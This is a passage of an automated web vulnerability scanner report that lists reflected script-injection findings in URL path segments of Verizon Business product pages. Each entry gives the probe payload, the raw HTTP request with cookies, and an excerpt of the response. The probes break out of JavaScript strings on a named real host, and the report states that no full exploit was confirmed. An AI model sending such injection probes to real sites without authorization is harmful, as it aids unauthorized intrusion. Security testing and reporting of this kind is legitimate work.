Connection: close
Expires: Mon, 16 Nov 2009 18:42:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/security669d5';88c3c18ede8/icsa-labs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.287. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 353f5"%3b19c93da1ee4 was submitted in the REST URL parameter 3. This input was echoed as 353f5";19c93da1ee4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/icsa-labs353f5"%3b19c93da1ee4/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43496
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/icsa-labs353f5";19c93da1ee4/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.288. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e9ff'%3b1c359516a8a was submitted in the REST URL parameter 3. This input was echoed as 5e9ff';1c359516a8a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/icsa-labs5e9ff'%3b1c359516a8a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43496
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/icsa-labs5e9ff';1c359516a8a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.289. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb32"%3b5c5cd0dd881 was submitted in the REST URL parameter 1. This input was echoed as bcb32";5c5cd0dd881 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsbcb32"%3b5c5cd0dd881/security/identity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsbcb32";5c5cd0dd881/security/identity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.290. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7d41'%3bf1ee5719256 was submitted in the REST URL parameter 1. This input was echoed as a7d41';f1ee5719256 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsa7d41'%3bf1ee5719256/security/identity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:42 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsa7d41';f1ee5719256/security/identity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.291. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b80b1"%3b175efb16b16 was submitted in the REST URL parameter 2. This input was echoed as b80b1";175efb16b16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/securityb80b1"%3b175efb16b16/identity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:50 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/securityb80b1";175efb16b16/identity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.292. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52b'%3bb33e431b249 was submitted in the REST URL parameter 2. This input was echoed as fc52b';b33e431b249 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/securityfc52b'%3bb33e431b249/identity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/securityfc52b';b33e431b249/identity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.293. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 190c3"%3bcc57f994bf7 was submitted in the REST URL parameter 3. This input was echoed as 190c3";cc57f994bf7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/identity190c3"%3bcc57f994bf7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43494
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/identity190c3";cc57f994bf7/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.294. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31a83'%3b6e0d786270a was submitted in the REST URL parameter 3. This input was echoed as 31a83';6e0d786270a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/identity31a83'%3b6e0d786270a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43494
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/identity31a83';6e0d786270a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.295. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 574a7'%3bf972f6d2f26 was submitted in the REST URL parameter 1. This input was echoed as 574a7';f972f6d2f26 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products574a7'%3bf972f6d2f26/security/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40652
Date: Wed, 17 Nov 2010 00:40:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products574a7';f972f6d2f26/security/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.296. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c87f2"%3b61493363023 was submitted in the REST URL parameter 1. This input was echoed as c87f2";61493363023 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsc87f2"%3b61493363023/security/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:31 GMT
Content-Type: text/html
Content-Length: 40652
Date: Wed, 17 Nov 2010 00:40:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsc87f2";61493363023/security/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.297. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 870ae'%3b657e038b906 was submitted in the REST URL parameter 2. This input was echoed as 870ae';657e038b906 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security870ae'%3b657e038b906/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42315
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security870ae';657e038b906/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.298. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a5d"%3bdbcfc28ad79 was submitted in the REST URL parameter 2. This input was echoed as 18a5d";dbcfc28ad79 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security18a5d"%3bdbcfc28ad79/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:50 GMT
Content-Type: text/html
Content-Length: 42317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security18a5d";dbcfc28ad79/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.299. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b9e2'%3bc1e1d89168d was submitted in the REST URL parameter 3. This input was echoed as 4b9e2';c1e1d89168d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/managed4b9e2'%3bc1e1d89168d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43492
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
